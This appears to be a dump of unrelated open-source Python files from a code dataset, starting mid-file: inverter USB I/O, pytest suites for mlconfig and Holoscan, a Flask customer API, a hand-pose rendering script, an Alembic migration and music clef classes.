os.open(self._serial_device, os.O_RDWR | os.O_NONBLOCK)\n except Exception as e:\n log.debug(\"USB open error: {}\".format(e))\n return command\n # Send the command to the open usb connection\n to_send = command.byte_command\n try:\n log.debug(\"length of to_send: {}\".format(len(to_send)))\n except: # noqa: E722\n import pdb\n pdb.set_trace()\n if len(to_send) <= 8:\n # Send all at once\n log.debug(\"1 chunk send\")\n time.sleep(0.35)\n os.write(usb0, to_send)\n elif len(to_send) > 8 and len(to_send) < 11:\n log.debug(\"2 chunk send\")\n time.sleep(0.35)\n os.write(usb0, to_send[:5])\n time.sleep(0.35)\n os.write(usb0, to_send[5:])\n else:\n while (len(to_send) > 0):\n log.debug(\"multiple chunk send\")\n # Split the byte command into smaller chucks\n send, to_send = to_send[:8], to_send[8:]\n log.debug(\"send: {}, to_send: {}\".format(send, to_send))\n time.sleep(0.35)\n os.write(usb0, send)\n time.sleep(0.25)\n # Read from the usb connection\n # try to a max of 100 times\n for x in range(100):\n # attempt to deal with resource busy and other failures to read\n try:\n time.sleep(0.15)\n r = os.read(usb0, 256)\n response_line += r\n except Exception as e:\n log.debug(\"USB read error: {}\".format(e))\n # Finished is \\r is in byte_response\n if (bytes([13]) in response_line):\n # remove anything after the \\r\n response_line = response_line[:response_line.find(bytes([13])) + 1]\n break\n log.debug('usb byte_response was: %s', response_line)\n \n # close file\n os.close(usb0)\n \n 
command.setByteResponse(response_line)\n return command\n\n def execute(self, cmd):\n \"\"\"\n Sends a command (as supplied) to inverter and returns the raw byte_response\n \"\"\"\n command = self._getCommand(cmd)\n if command is None:\n log.critical(\"Command not found\")\n return None\n elif (self._test_device):\n log.info('TEST connection: executing %s', command)\n return self._doTestCommand(command)\n elif (self._direct_usb):\n log.info('DIRECT USB connection: executing %s', command)\n return self._doDirectUsbCommand(command)\n else:\n log.info('SERIAL connection: executing %s', command)\n return self._doSerialCommand(command)\n","repo_name":"vavyen/mpp-solar","sub_path":"mppsolar/mppinverter.py","file_name":"mppinverter.py","file_ext":"py","file_size_in_byte":12217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"26561701616","text":"import pytest\n\nfrom mlconfig import getcls\nfrom mlconfig import instantiate\nfrom mlconfig import load\nfrom mlconfig import register\n\n\n@register\nclass Point(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __repr__(self):\n return self.__class__.__name__ + '(x={}, y={})'.format(self.x, self.y)\n\n def __add__(self, other):\n return Point(self.x + other.x, self.y + other.y)\n\n\n@register\ndef add(x, y):\n return x + y\n\n\n@pytest.fixture\ndef obj():\n return {\n 'x1': 1,\n 'x2': 2,\n 'a': {\n 'name': 'Point',\n 'x': '${x1}',\n 'y': 3\n },\n 'b': {\n 'name': 'Point',\n 'x': '${x1}',\n 'y': 4\n },\n 'op': {\n 'name': 'add'\n }\n }\n\n\n@pytest.fixture\ndef conf(obj):\n return load(obj=obj)\n\n\ndef test_instantiate(conf, obj):\n assert conf['x1'] == conf['a']['x'] == conf['b']['x'] == obj['x1']\n assert conf['x1'] == conf['b']['x'] == conf['b']['x'] == obj['x1']\n\n instantiate(conf.a)\n\n a = instantiate(conf.a)\n b = instantiate(conf.b)\n conf = instantiate(conf.op, a, b)\n assert conf.x == 2 * obj['x1']\n assert conf.y == obj['a']['y'] + obj['b']['y']\n\n\ndef test_getcls(conf):\n assert getcls(conf['a']) == Point\n","repo_name":"narumiruna/mlconfig","sub_path":"tests/test_conf.py","file_name":"test_conf.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"54"} +{"seq_id":"37187083322","text":"import datetime\n\nimport pytest\n\nfrom holoscan.conditions import (\n BooleanCondition,\n CountCondition,\n DownstreamMessageAffordableCondition,\n MessageAvailableCondition,\n PeriodicCondition,\n)\nfrom holoscan.core import Application, Condition, ConditionType, Operator\nfrom holoscan.gxf import Entity, GXFCondition\n\n\nclass TestBooleanCondition:\n def test_kwarg_based_initialization(self, app, capfd):\n cond = BooleanCondition(fragment=app, name=\"boolean\", enable_tick=True)\n assert isinstance(cond, GXFCondition)\n assert isinstance(cond, Condition)\n assert cond.gxf_typename == \"nvidia::gxf::BooleanSchedulingTerm\"\n\n # assert no warnings or errors logged\n captured = capfd.readouterr()\n assert \"error\" not in captured.err\n assert \"warning\" not in captured.err\n\n def test_enable_tick(self, app, capfd):\n cond = BooleanCondition(fragment=app, name=\"boolean\", enable_tick=True)\n cond.disable_tick()\n assert not cond.check_tick_enabled()\n\n cond.enable_tick()\n assert cond.check_tick_enabled()\n\n def test_default_initialization(self, app):\n BooleanCondition(app)\n\n def test_positional_initialization(self, app):\n BooleanCondition(app, False, \"bool\")\n\n\nclass 
TestCountCondition:\n def test_kwarg_based_initialization(self, app, capfd):\n cond = CountCondition(fragment=app, name=\"count\", count=100)\n assert isinstance(cond, GXFCondition)\n assert isinstance(cond, Condition)\n assert cond.gxf_typename == \"nvidia::gxf::CountSchedulingTerm\"\n\n # assert no warnings or errors logged\n captured = capfd.readouterr()\n assert \"error\" not in captured.err\n assert \"warning\" not in captured.err\n\n def test_count(self, app, capfd):\n cond = CountCondition(fragment=app, name=\"count\", count=100)\n cond.count = 10\n assert cond.count == 10\n\n def test_default_initialization(self, app):\n CountCondition(app)\n\n def test_positional_initialization(self, app):\n CountCondition(app, 100, \"counter\")\n\n\nclass TestDownstreamMessageAffordableCondition:\n def test_kwarg_based_initialization(self, app, capfd):\n cond = DownstreamMessageAffordableCondition(\n fragment=app, name=\"downstream_affordable\", min_size=10\n )\n assert isinstance(cond, GXFCondition)\n assert isinstance(cond, Condition)\n assert cond.gxf_typename == \"nvidia::gxf::DownstreamReceptiveSchedulingTerm\"\n\n # assert no warnings or errors logged\n captured = capfd.readouterr()\n assert \"error\" not in captured.err\n assert \"warning\" not in captured.err\n\n def test_default_initialization(self, app):\n DownstreamMessageAffordableCondition(app)\n\n def test_positional_initialization(self, app):\n DownstreamMessageAffordableCondition(app, 4, \"affordable\")\n\n\nclass TestMessageAvailableCondition:\n def test_kwarg_based_initialization(self, app, capfd):\n cond = MessageAvailableCondition(\n fragment=app, name=\"message_available\", min_size=1, front_stage_max_size=10\n )\n assert isinstance(cond, GXFCondition)\n assert isinstance(cond, Condition)\n assert cond.gxf_typename == \"nvidia::gxf::MessageAvailableSchedulingTerm\"\n\n # assert no warnings or errors logged\n captured = capfd.readouterr()\n assert \"error\" not in captured.err\n assert \"warning\" not in captured.err\n\n def test_default_initialization(self, app):\n MessageAvailableCondition(app)\n\n def test_positional_initialization(self, app):\n MessageAvailableCondition(app, 1, 4, \"available\")\n\n\nclass TestPeriodicCondition:\n def test_kwarg_based_initialization(self, app, capfd):\n cond = PeriodicCondition(fragment=app, name=\"periodic\", recess_period=100)\n assert isinstance(cond, GXFCondition)\n assert isinstance(cond, Condition)\n assert cond.gxf_typename == \"nvidia::gxf::PeriodicSchedulingTerm\"\n\n # assert no warnings or errors logged\n captured = capfd.readouterr()\n assert \"error\" not in captured.err\n assert \"warning\" not in captured.err\n\n @pytest.mark.parametrize(\n \"period\",\n [\n 1000,\n datetime.timedelta(minutes=1),\n datetime.timedelta(seconds=1),\n datetime.timedelta(milliseconds=1),\n datetime.timedelta(microseconds=1),\n ],\n )\n def test_periodic_constructors(self, app, capfd, period):\n cond = PeriodicCondition(fragment=app, name=\"periodic\", recess_period=period)\n if isinstance(period, int):\n expected_ns = period\n else:\n expected_ns = int(period.total_seconds() * 1_000_000_000)\n\n assert cond.recess_period_ns() == expected_ns\n\n @pytest.mark.parametrize(\n \"period\",\n [\n 1000,\n datetime.timedelta(minutes=1),\n datetime.timedelta(seconds=1),\n datetime.timedelta(milliseconds=1),\n datetime.timedelta(microseconds=1),\n ],\n )\n def test_recess_period_method(self, app, capfd, period):\n cond = PeriodicCondition(fragment=app, name=\"periodic\", recess_period=1)\n 
cond.recess_period(period)\n if isinstance(period, int):\n expected_ns = period\n else:\n expected_ns = int(period.total_seconds() * 1_000_000_000)\n\n assert cond.recess_period_ns() == expected_ns\n\n def test_positional_initialization(self, app):\n PeriodicCondition(app, 100000, \"periodic\")\n\n def test_invalid_recess_period_type(self, app):\n with pytest.raises(TypeError):\n PeriodicCondition(app, recess_period=\"100s\", name=\"periodic\")\n\n\n####################################################################################################\n# Test Ping app with no conditions on Rx operator\n####################################################################################################\n\n\nclass PingTxOpNoCondition(Operator):\n def __init__(self, *args, **kwargs):\n self.index = 0\n # Need to call the base class constructor last\n super().__init__(*args, **kwargs)\n\n def setup(self, spec):\n spec.output(\"out1\")\n spec.output(\"out2\")\n\n def compute(self, op_input, op_output, context):\n self.index += 1\n if self.index == 1:\n print(f\"#TX{self.index}\") # no emit\n elif self.index == 2:\n print(f\"#T1O{self.index}\") # emit only out1\n op_output.emit(self.index, \"out1\")\n elif self.index == 3:\n print(f\"#T2O{self.index}\") # emit only out2 (Entity object)\n entity = Entity(context)\n op_output.emit(entity, \"out2\")\n elif self.index == 4:\n print(f\"#TO{self.index}\") # emit both out1 and out2 (out2 is Entity object)\n op_output.emit(self.index, \"out1\")\n entity = Entity(context)\n op_output.emit(entity, \"out2\")\n else:\n print(f\"#TX{self.index}\") # no emit\n\n\nclass PingRxOpNoInputCondition(Operator):\n def __init__(self, *args, **kwargs):\n self.index = 0\n # Need to call the base class constructor last\n super().__init__(*args, **kwargs)\n\n def setup(self, spec):\n # No input condition\n spec.input(\"in1\").condition(ConditionType.NONE)\n spec.input(\"in2\").condition(ConditionType.NONE)\n\n def compute(self, op_input, op_output, context):\n self.index += 1\n value1 = op_input.receive(\"in1\")\n value2 = op_input.receive(\"in2\")\n\n # Since value can be an empty dict, we need to check for None explicitly\n if value1 is not None and value2 is None:\n print(f\"#R1O{self.index}\")\n elif value1 is None and value2 is not None:\n print(f\"#R2O{self.index}\")\n elif value1 is not None and value2 is not None:\n print(f\"#RO{self.index}\")\n else:\n print(f\"#RX{self.index}\")\n\n\nclass PingRxOpNoInputConditionApp(Application):\n def compose(self):\n tx = PingTxOpNoCondition(self, CountCondition(self, 5), name=\"tx\")\n rx = PingRxOpNoInputCondition(self, CountCondition(self, 5), name=\"rx\")\n self.add_flow(tx, rx, {(\"out1\", \"in1\"), (\"out2\", \"in2\")})\n\n\ndef test_ping_no_input_condition(capfd):\n app = PingRxOpNoInputConditionApp()\n app.run()\n\n captured = capfd.readouterr()\n\n sequence = (line[1:] if line.startswith(\"#\") else \"\" for line in captured.out.splitlines())\n # The following sequence is expected:\n # TX1->RX1, T1O2-> R1O2, T2O3->R2O3, TO4->RO4, TX5->RX5\n assert \"\".join(sequence) == \"TX1RX1T1O2R1O2T2O3R2O3TO4RO4TX5RX5\"\n\n error_msg = captured.err.lower()\n assert \"error\" not in error_msg\n assert \"warning\" not in error_msg\n","repo_name":"nvidia-holoscan/holoscan-sdk","sub_path":"python/tests/unit/test_conditions.py","file_name":"test_conditions.py","file_ext":"py","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"54"} +{"seq_id":"4319412342","text":"from 
yome import Session, Base\n\nimport pytest\nfrom os import remove\nimport logging\nfrom sqlalchemy import create_engine\nfrom os.path import join, dirname, realpath\n\ndirectory = dirname(realpath(__file__))\ntest_db_filepath = join(directory, '..', 'yome_test.db')\n\n@pytest.fixture(scope='session')\ndef test_db(request):\n try:\n remove(test_db_filepath)\n except FileNotFoundError:\n pass\n engine = create_engine(f'sqlite:///{test_db_filepath}')\n Base.metadata.create_all(engine)\n Session.configure(bind=engine)\n\n@pytest.fixture(scope='session')\ndef session(request, test_db):\n \"\"\"Make a session\"\"\"\n def teardown():\n Session.close_all()\n request.addfinalizer(teardown)\n return Session()\n","repo_name":"zakandrewking/y-ome","sub_path":"yome/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"27658385092","text":"\"\"\"\nThis module contains all of Resources for the Customer API\n\"\"\"\nimport json\nfrom flask import abort, request, make_response\nfrom flask_restful import Resource\nfrom flask_api import status\nfrom werkzeug.exceptions import BadRequest\nfrom service import app, api, apii, ns, Customer_model\nfrom service.models import Customer, DataValidationError\n\n######################################################################\n# PATH: /pets/{id}\n######################################################################\n\n@ns.route('/')\n@ns.param('customer_id', 'The customer identifier')\nclass CustomerResource(Resource):\n \"\"\"\n CustomerResource class\n\n Allows the manipulation of a single Customer\n GET /customers/{id} - Returns a Customer with the id\n PUT /customers/{id} - Updates a Customer with the id\n DELETE /customers/{id} - Deletes a Customer with the id\n \"\"\"\n\n @ns.doc('get_customers')\n @ns.response(404, 'Customer not found')\n @ns.marshal_with(Customer_model)\n def get(self, customer_id):\n \"\"\"\n Retrieve a single Customer\n \"\"\"\n app.logger.info('Finding a Customer with id [{}]'.format(customer_id))\n customer = Customer.find(customer_id)\n if customer:\n message = customer.serialize()\n return_code = status.HTTP_200_OK\n else:\n message = {'error': 'Customer with id: %s was not found' % str(customer_id)}\n return_code = status.HTTP_404_NOT_FOUND\n return message, return_code\n\n\n @ns.doc('update_customer')\n @ns.response(404, 'Customer not found')\n @ns.response(400, 'The posted Customer data was not valid')\n @ns.expect(Customer_model)\n @ns.marshal_with(Customer_model)\n def put(self, customer_id):\n \"\"\"\n Update a single Customer\n \"\"\"\n app.logger.info('Updating a Customer with id [{}]'.format(customer_id))\n\n content_type = request.headers.get('content_type')\n\n if not content_type or content_type != 'application/json':\n abort(status.HTTP_400_BAD_REQUEST, \"No Content-Type set\")\n\n customer = Customer.find(customer_id)\n if not customer:\n abort(status.HTTP_404_NOT_FOUND, \"Customer with id '{}' was not found.\".format(customer_id))\n\n customer_info = request.get_json()\n customer_info.pop(\"_id\", None)\n try:\n customer.deserialize(customer_info)\n except DataValidationError as error:\n raise BadRequest(str(error))\n\n customer._id = customer_id\n customer.save()\n\n message = customer.serialize()\n return_code = status.HTTP_200_OK\n return message, return_code\n\n @ns.doc('delete_customers')\n @ns.response(204, 'Customer deleted')\n def delete(self, customer_id):\n \"\"\"\n Delete 
a Customer\n \"\"\"\n app.logger.info('Deleting a Customer with id [{}]'.format(customer_id))\n customer = Customer.find(customer_id)\n if customer:\n customer.delete()\n return '', status.HTTP_204_NO_CONTENT\n\n######################################################################\n# DELETE ALL PET DATA (for testing only)\n######################################################################\n @app.route('/customers/reset', methods=['DELETE'])\n def customers_reset():\n \"\"\" Removes all customers from the database \"\"\"\n Customer.remove_all()\n return '', status.HTTP_204_NO_CONTENT\n","repo_name":"devops-customers-18/customers","sub_path":"service/resources/customer_resource.py","file_name":"customer_resource.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73415845283","text":"__author__ = 'Yule'\nimport numpy as np\nimport pandas as pd\nfrom sklearn import linear_model, datasets\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\n\n\n# Maximum number of iterations. Continue until this limit, or when error change is below tol.\nmax_iter = 500\ntol = 0.00001\n\n# Step size for gradient descent.\neta = 0.5\n#MFCC starts from 874, ends at 886.\nStart=874\nEnd=886\nTarget=1947\nsecond=20000\nPercentage_train=0.7\nDATASET_PATH_BASE = '/Users/Yule/Documents/Machine Learning/Project/data'\nms_array = [5000, 10000, 20000, 30000]\nlocation = ['Corner Stone', 'Lecture room', 'busloop', 'lake', 'Dinning hall', 'aq', 'gym', 'lib' ]\ndef logistic_regression(second,Percentage_train):\n second_path_base = DATASET_PATH_BASE + '/' + str(second) + '/'\n data_path = second_path_base + location[0] + '/data_shuffle.csv'\n data = pd.read_csv(data_path, na_values='_',encoding=\"ISO-8859-1\")\n X = data.values[0:int(Percentage_train*len(data)),Start:End+1]\n T = data.values[0:int(Percentage_train*len(data)),Target]\n\n for l in location[1:8]:\n data_path = second_path_base + l + '/data_shuffle.csv'\n data = pd.read_csv(data_path, na_values='_',encoding=\"ISO-8859-1\")\n #shuffle the dataframe\n #data=data.reindex(np.random.permutation(data.index))\n x = data.values[0:int(Percentage_train*len(data)),Start:End+1]\n t = data.values[0:int(Percentage_train*len(data)),Target]\n X=np.concatenate((X, x), axis=0)\n T=np.concatenate((T, t), axis=0)\n\n\n\n logreg = linear_model.LogisticRegression(C=1e5)\n # we create an instance of Neighbours Classifier and fit the data.\n logreg.fit(X, T)\n\n data_path = second_path_base + location[0] + '/data_shuffle.csv'\n data_test = pd.read_csv(data_path, na_values='_',encoding=\"ISO-8859-1\")\n X_test = data_test.values[int(Percentage_train*len(data_test)):,Start:End+1]\n T_test = data_test.values[int(Percentage_train*len(data_test)):,Target]\n\n for l in location[1:8]:\n data_path = second_path_base + l + '/data_shuffle.csv'\n data_test = pd.read_csv(data_path, na_values='_',encoding=\"ISO-8859-1\")\n\n x = data_test.values[int(Percentage_train*len(data_test)):,Start:End+1]\n t = data_test.values[int(Percentage_train*len(data_test)):,Target]\n X_test=np.concatenate((X_test, x), axis=0)\n T_test=np.concatenate((T_test, t), axis=0)\n\n\n\n print(\"Total training accuracy:\",logreg.score(X,T))\n print(\"Total test accuracy:\",logreg.score(X_test,T_test))\n logreg = linear_model.LogisticRegression(C=1e5)\n # we create an instance of Neighbours Classifier and fit the data.\n T_pred=logreg.fit(X, T).predict(X_test)\n\n cnf_matrix = 
confusion_matrix(T_test, T_pred)\n print(\"Confusion Matrix:\\n%s\" %cnf_matrix)\n print(\"Classfication report:\\n%s\" %classification_report(T_test, T_pred))\n \n print(\"Accuracy for each location:\")\n for l in location:\n data_path = second_path_base + l + '/data_shuffle.csv'\n data_test = pd.read_csv(data_path, na_values='_',encoding=\"ISO-8859-1\")\n X_test = data_test.values[int(Percentage_train*len(data_test)):,Start:End+1]\n T_test = data_test.values[int(Percentage_train*len(data_test)):,Target]\n print(l,\":\",logreg.score(X_test,T_test))\n\n\nlogistic_regression(second,Percentage_train)\n","repo_name":"yulew/MechineLearningProject","sub_path":"logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38760472323","text":"from flask import Flask, render_template\nimport requests\napp = Flask(__name__)\n\n@app.route('/')\ndef homepage():\n return render_template('index.html')\n\n@app.route('/blog')\ndef blog():\n response = requests.get('https://api.npoint.io/49943cbdc8ee3ec5a615').json()\n return render_template('blog.html', title=response['title'], blog=response['blog'], link=response['link'])\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"KarolinaZawisza/blog-template","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35269145473","text":"import os\nfrom setuptools import setup, find_packages\n\n\ndef read_version():\n for line in open(os.path.join('ncbi_accession_download', '__init__.py'), 'r'):\n if line.startswith('__version__'):\n return line.split('=')[-1].strip().strip(\"'\")\n\n\nsetup(\n name=\"ncbi_accession_download\",\n version=read_version(),\n author=\"Honeyu Chen\",\n author_email=\"eacochen@163.com\",\n description=\"Fast, Download mixed ncbi accession number in a batch way.\",\n\n url=\"https://github.com/EacoChen/ncbi_download\",\n packages=find_packages(),\n classifiers = [\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Science/Research',\n 'Topic :: Scientific/Engineering :: Bio-Informatics',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Natural Language :: Chinese (Simplified)',\n 'Operating System :: Microsoft :: Windows :: Windows 10'\n ],\n \n install_requires = ['requests >= 2.24.0',\n 'tqdm >= 4.46.1',\n 'biopython >= 1.77',\n 'beautifulsoup4 >= 4.9.1'],\n \n python_requires='>=3.7',\n \n entry_points={\n 'console_scripts': [\n 'ncbi-acc-download=ncbi_accession_download.core:main',\n 'nad=ncbi_accession_download.core:main'\n ],\n },\n\n)","repo_name":"EacoChen/ncbi_download","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"36856369212","text":"import cv2\nimport json\nimport copy\nfrom pycocotools.coco import COCO\nimport os.path as osp\nfrom tqdm import tqdm\nimport torch\nimport smplx\nfrom glob import glob\nimport os\nos.environ[\"PYOPENGL_PLATFORM\"] = \"egl\"\nimport pyrender\nimport trimesh\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nCOLORMAP = {\n \"thumb\": {\"ids\": [0, 1, 2, 3, 4], \"color\": \"g\"},\n \"index\": {\"ids\": [0, 5, 6, 7, 8], \"color\": \"c\"},\n \"middle\": {\"ids\": [0, 9, 10, 11, 12], 
\"color\": \"b\"},\n \"ring\": {\"ids\": [0, 13, 14, 15, 16], \"color\": \"m\"},\n \"little\": {\"ids\": [0, 17, 18, 19, 20], \"color\": \"r\"},\n}\n\ndef load_data():\n \n data_split = 'train'\n data_path = '/root/dataset/freihand'\n #human_bbox_root_dir = osp.join('..', 'data', 'FreiHAND', 'rootnet_output', 'bbox_root_freihand_output.json')\n \n if data_split == 'train':\n db = COCO(osp.join(data_path, 'moon/freihand_train_coco.json'))\n with open(osp.join(data_path, 'moon/freihand_train_data.json')) as f:\n data = json.load(f)\n \n else:\n db = COCO(osp.join(data_path, 'moon/freihand_eval_coco.json'))\n with open(osp.join(data_path, 'moon/freihand_eval_data.json')) as f:\n data = json.load(f)\n #print(\"Get bounding box and root from \" + human_bbox_root_dir)\n bbox_root_result = {}\n #with open(human_bbox_root_dir) as f:\n # annot = json.load(f)\n #for i in range(len(annot)):\n # bbox_root_result[str(annot[i]['image_id'])] = {'bbox': np.array(annot[i]['bbox']), 'root': np.array(annot[i]['root_cam'])}\n\n datalist = []\n for aid in tqdm(db.anns.keys()):\n ann = db.anns[aid]\n image_id = ann['image_id']\n img = db.loadImgs(image_id)[0]\n img_path = osp.join(data_path, img['file_name'])\n img_shape = (img['height'], img['width'])\n db_idx = str(img['db_idx'])\n\n if data_split == 'train':\n cam_param, mano_param = data[db_idx]['cam_param'], data[db_idx]['mano_param']\n mano_param['hand_type'] = 'right' # FreiHAND only contains right hand\n #bbox = process_bbox(np.array(ann['bbox']), img['width'], img['height'])\n #if bbox is None: continue\n #render(mano_param, cam_param, img, img_path)\n joint_3d = data[db_idx]['joint_3d']\n joint_3d = np.array(joint_3d)\n joint_2d = joint_3d[:, :2]\n \n\n datalist.append({\n 'img_path': img_path,\n 'img_shape': img_shape,\n #'bbox': bbox,\n 'cam_param': cam_param,\n 'mano_param': mano_param})\n else:\n cam_param = data[db_idx]['cam_param']\n #bbox = bbox_root_result[str(image_id)]['bbox'] # bbox should be aspect ratio preserved-extended. 
It is done in RootNet.\n root_joint_depth = bbox_root_result[str(image_id)]['root'][2]\n\n datalist.append({\n 'img_path': img_path,\n 'img_shape': img_shape,\n #'bbox': bbox,\n 'root_depth': root_joint_depth,\n 'cam_param': cam_param})\n\ndef projectPoints(xyz, K):\n \"\"\"\n Projects 3D coordinates into image space.\n Function taken from https://github.com/lmb-freiburg/freihand\n \"\"\"\n xyz = np.array(xyz)\n K = np.array(K)\n uv = np.matmul(K, xyz.T).T\n return uv[:, :2] / uv[:, -1:]\n\ndef load_data2():\n \n data_split = 'train'\n data_path = '/root/dataset/freihand'\n xyz_path = 'training_xyz.json'\n k_path = 'training_K.json'\n #human_bbox_root_dir = osp.join('..', 'data', 'FreiHAND', 'rootnet_output', 'bbox_root_freihand_output.json')\n \n if data_split == 'train':\n with open(osp.join(data_path, xyz_path)) as f:\n xyz = json.load(f)\n with open(osp.join(data_path, k_path)) as f:\n k = json.load(f)\n \n for idx in tqdm(range(len(xyz))):\n keypoints = projectPoints(xyz[idx], k[idx])\n #plt.figure(figsize=(2.24, 2.24), dpi=100)\n empty_image = np.zeros([224, 224, 3])\n plt.imshow(empty_image)\n plt.scatter(keypoints[:, 0], keypoints[:, 1], c=\"k\", alpha=1)\n for finger, params in COLORMAP.items():\n plt.plot(\n keypoints[params[\"ids\"], 0],\n keypoints[params[\"ids\"], 1],\n params[\"color\"],\n )\n plt.axis('off')\n save_folder = '/root/dataset/freihand/training/pose'\n os.makedirs(save_folder, exist_ok=True)\n save_path = os.path.join(save_folder, str(idx).zfill(8) + '.jpg')\n plt.savefig(save_path, bbox_inches='tight', pad_inches=0, dpi=60.7)\n plt.close()\n #plt.savefig('test_2dpose.png', pad_inches=0)\n \n #fig = plt.gcf()\n #fig.canvas.draw()\n #image_array = np.array(fig.canvas.renderer.buffer_rgba())\n #image_cv2 = cv2.cvtColor(image_array, cv2.COLOR_RGBA2BGR)\n #cv2.imwrite('test_2dpose.png', image_cv2)\n \n \nif __name__ == \"__main__\":\n #load_data()\n load_data2()\n","repo_name":"redorangeyellowy/hand_rendering","sub_path":"freihand_2dpose.py","file_name":"freihand_2dpose.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71575900323","text":"\"\"\"All models migration file\n\nRevision ID: a7c7fe6c0b87\nRevises: \nCreate Date: 2019-06-16 07:16:25.568017\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\nimport depot\n# revision identifiers, used by Alembic.\nimport sa_types\n\nrevision = 'a7c7fe6c0b87'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('async_task',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('task_id', sa.String(length=64), nullable=True),\n sa.Column('payload', postgresql.JSONB(astext_type=sa.Text()), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_async_task_task_id'), 'async_task', ['task_id'], unique=False)\n op.create_table('bulk_csv_upload',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('csv', depot.fields.sqlalchemy.UploadedFileField(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('product',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('name', sa.String(length=256), nullable=False),\n sa.Column('sku', sa.String(length=256), nullable=False),\n sa.Column('description', sa.String(length=1024), nullable=False),\n sa.Column('status', sa.String(64), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_product_sku'), 'product', ['sku'], unique=True)\n op.create_index(op.f('ix_product_status'), 'product', ['status'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_product_status'), table_name='product')\n op.drop_index(op.f('ix_product_sku'), table_name='product')\n op.drop_table('product')\n op.drop_table('bulk_csv_upload')\n op.drop_index(op.f('ix_async_task_task_id'), table_name='async_task')\n op.drop_table('async_task')\n # ### end Alembic commands ###\n","repo_name":"impiyush83/import-large-dataset-file-to-db","sub_path":"migrations/versions/a7c7fe6c0b87_all_models_migration_file.py","file_name":"a7c7fe6c0b87_all_models_migration_file.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8257758016","text":"from __future__ import absolute_import\n\n#FIXME: voice1_lowest_ylinepos and stempos in the original parser.py\n# give some alignment we need to implement here too.\n\n# FIXME: I think the StemEngraver should take care of shifting of\n# noteheads. So I think it should be given the created NoteHeadEngravers\n# and then shift the notes.\n\nimport copy\nimport re\nimport weakref\n\nfrom solfege.mpd import _exceptions\nfrom solfege.mpd import const\nfrom solfege.mpd.rat import Rat\nfrom solfege.mpd.duration import Duration\nfrom solfege.mpd.musicalpitch import MusicalPitch\n\n#FIXME duplicate of code in Lexer\nre_melodic = re.compile(r\"\"\"(?x)\n ((?P[a-zA-Z]+)\n (?P[',]*))\n (?P[\\d]*)\n (?P\\.*)\"\"\", re.UNICODE)\n\nclass UnknownClefException(_exceptions.MpdException):\n def __init__(self, clef):\n _exceptions.MpdException.__init__(self)\n self.m_clef = clef\n def __str__(self):\n return \"'%s' is not a valid clef. Maybe a bug in your lessonfile?\" % self.m_clef\n\nclass Clef(object):\n # Use these constants to access the data in clefdata.\n SYM = 0\n # Which staff line should the clef be on lines 1 to 5. 1 is the lowest line\n LINE = 1\n # On which position in the staff is the middle C. 0 is the middle line\n # in the staff. 
Positive values are up, negative are down.\n POS = 2\n clefdata = {\n 'treble': ('G', 2, -6),\n 'violin': ('G', 2, -6),\n 'G': ('G', 2, -6),\n 'G2': ('G', 2, -6),\n 'french': ('G', 1, -8),\n #\n 'subbass': ('F', 5, 8),\n 'bass': ('F', 4, 6),\n 'F': ('F', 4, 6),\n 'varbaritone': ('F', 3, 4),\n #\n 'baritone': ('C', 5, 4),\n 'tenor': ('C', 4, 2),\n 'alto': ('C', 3, 0),\n 'C': ('C', 3, 0),\n 'mezzosoprano': ('C', 2, -2),\n 'soprano': ('C', 1, -4),\n }\n octaviation_re = re.compile(\"(?P[A-Za-z1-9]+)(?P([_^])(8|15))?$\")\n def __init__(self, clefname):\n m = self.octaviation_re.match(clefname)\n if not m:\n raise UnknownClefException(clefname)\n if m.group('name') not in self.clefdata:\n raise UnknownClefException(clefname)\n try:\n self.m_octaviation = {'_8': -7, '_15': -14, '^8': 7, '^15': 14,\n None: 0}[m.group('oct')]\n except KeyError:\n raise UnknownClefException(clefname)\n self.m_name = m.group('name')\n def get_symbol(self):\n return self.clefdata[self.m_name][self.SYM]\n def get_stafflinepos(self):\n return self.clefdata[self.m_name][self.LINE]\n def steps_to_ylinepos(self, 